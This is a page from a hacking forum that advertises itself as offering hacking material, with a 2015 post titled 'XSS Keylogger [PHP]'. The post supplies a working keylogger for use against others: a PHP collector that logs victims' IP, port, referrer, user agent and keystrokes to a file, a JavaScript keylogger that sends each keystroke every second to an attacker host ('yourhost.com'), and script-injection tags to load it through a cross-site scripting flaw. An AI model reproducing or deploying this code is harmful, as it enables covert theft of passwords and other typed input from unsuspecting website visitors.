www.i4info.org

Would you like to react to this message? Create an account in a few clicks or log in to continue.
www.i4info.org

i4info Provides the best hacking Material. Latest hacking tutorials and tools are available here. It is the best place for hackers.

Latest topics

» Teen Patti Gold Hack & 3 Patti Chips Code Extra Bonus 2017
XSS Keylogger [PHP] EmptySat Apr 29, 2017 10:50 am by ubedullah

» Group hackers
XSS Keylogger [PHP] EmptySat Apr 15, 2017 2:37 pm by Group Hackers

» Hacker Needed
XSS Keylogger [PHP] EmptySat Apr 15, 2017 3:57 am by Group Hackers

» Hacker Needed
XSS Keylogger [PHP] EmptySat Apr 15, 2017 1:45 am by Group Hackers

» Hacker Needed
XSS Keylogger [PHP] EmptyThu Apr 13, 2017 11:10 pm by Group Hackers

» Hacker Needed
XSS Keylogger [PHP] EmptyTue Apr 11, 2017 2:07 pm by Group Hackers

» Hacker Needed
XSS Keylogger [PHP] EmptyTue Apr 11, 2017 2:21 am by Group Hackers

» Hacker Needed
XSS Keylogger [PHP] EmptyTue Apr 11, 2017 2:06 am by Group Hackers

» Hacker Needed
XSS Keylogger [PHP] EmptyTue Apr 11, 2017 1:35 am by Group Hackers

November 2024

MonTueWedThuFriSatSun
    123
45678910
11121314151617
18192021222324
252627282930 

Calendar Calendar

Affiliates


free forum

Forumotion on Facebook Forumotion on Twitter Forumotion on YouTubeForumotion on Google+

Visitors Counter


Flag Counter


    XSS Keylogger [PHP]

    Admin
    Admin
    Admin


    Posts : 474
    Reputation : 8
    Join date : 2014-12-10
    Age : 32
    Location : Pakistan

    XSS Keylogger [PHP] Empty XSS Keylogger [PHP]

    Post by Admin Wed Mar 04, 2015 7:44 pm

     

    XSS Keylogger [PHP] Xss-threat3

    You can use this method when cookies from target can't be reused.
    You need one host where to upload:

    code:
    CODE:

    <?php
    $Keylog = $_GET["c"];
    $reffer = $_SERVER['HTTP_REFERER'];
    $ip = $_SERVER['REMOTE_ADDR'];
    $date=date ("l dS of F Y h:i:s A");
    $port = $_SERVER['REMOTE_PORT'];
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $file = fopen('data.txt', 'a');
    fwrite($file, 'Ip: '.$ip."\n");
    fwrite($file, 'Port: '.$port."\n");
    fwrite($file, 'Refferer: '.$reffer."\n");
    fwrite($file, 'User Agent: '.$user_agent."\n");
    fwrite($file, 'Date: '.$date."\n");
    fwrite($file, $Keylog."\n");
    fwrite($file, "---------------------------\n\n");
    fclose($file);
    ?>


    k.js:
    PHP Code:

    CODE:
    var keys='';
    document.onkeypress = function(e) {
    get = window.event?event:e;
    key = get.keyCode?get.keyCode:get.charCode;
    key = String.fromCharCode(key);
    keys+=key;
    }
    window.setInterval(function(){
    new Image().src = 'http://yourhost.com/g.php?c='+keys;
    keys = '';
    }, 1000);


    Make one new file named data.txt and chmod 777 data.txt

    You can use it like this:
    Code:
    CODE:

    [You must be registered and logged in  to see this link.] src="http://yourhost.com/k.js"></script>


    or
    Code:

    CODE:

    [You must be registered and logged in  to see this link.] language="JavaScript" src="http://yourhost.com/k.js"></script>



     

      Current date/time is Fri Nov 22, 2024 8:29 am